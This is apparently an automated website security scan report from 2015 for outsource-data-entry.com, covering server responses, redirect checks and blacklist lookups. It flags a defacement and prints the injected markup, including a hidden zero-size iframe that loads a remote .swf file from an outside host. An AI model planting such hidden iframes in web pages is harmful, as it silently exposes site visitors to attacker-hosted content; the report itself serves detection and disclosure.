Scanned pages/files
Request | Server response | Status |
http://outsource-data-entry.com/ | HTTP/1.1 301 Moved Permanently Connection: close Date: Sat, 19 Dec 2015 08:16:47 GMT Location: http://www.outsource-data-entry.com/ Server: Apache Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9 Content-Length: 244 Content-Type: text/html; charset=iso-8859-1 | clean |
http://www.outsource-data-entry.com/ | 200 OK Content-Length: 4263 Content-Type: text/html | suspicious |
Hidden iFrame found. size: 0x0 src: http://8pic.ir/images/vcf37imxdb1r7w7c1iae.swf <iframe width="0" height="0" scrolling="no" frameborder="no" src="http://8pic.ir/images/vcf37imxdb1r7w7c1iae.swf"> Deface/Content modification. The following signature was found: HACKED By INNOC3NT KING H4CK3R ...[195 bytes skipped]... 1999/xhtml"> <html><head></style><iframe width="0" height="0" scrolling="no" frameborder="no" src="http://8pic.ir/images/vcf37imxdb1r7w7c1iae.swf"></iframe> </body> </ <head> <meta http-equiv="Content-Language" content="fa" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>HACKED By INNOC3NT KING H4CK3R</title> <style type="text/css"> .style1 { text-align: center; font-size: 14pt; color: #00FF00; } .style2 { text-align: center; font-family: Arial Black; font-size: 25pt; color: #00FF00; } .style5 { font-family: Tahoma; } </style> </head> <body style="color: #FF0000; background-color: #000000"> <p class="st ...[4005 bytes skipped]... | ||
http://www.outsource-data-entry.com/test404page.js | 404 Not Found Content-Length: 331 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: outsource-data-entry.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Dec 2015 08:16:47 GMT
Location: http://www.outsource-data-entry.com/
Server: Apache Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1
...244 bytes of data.
GET / HTTP/1.1
Host: outsource-data-entry.com
Result:
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 19 Dec 2015 08:16:47 GMT
Location: http://www.outsource-data-entry.com/
Server: Apache Phusion_Passenger/4.0.10 mod_bwlimited/1.4 mod_fcgid/2.3.9
Content-Length: 244
Content-Type: text/html; charset=iso-8859-1
...244 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: outsource-data-entry.com
Referer: http://www.google.com/search?q=outsource-data-entry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: outsource-data-entry.com
Referer: http://www.google.com/search?q=outsource-data-entry.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=outsource-data-entry.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://outsource-data-entry.com/
Result: outsource-data-entry.com is not infected or malware details are not published yet.
Result: outsource-data-entry.com is not infected or malware details are not published yet.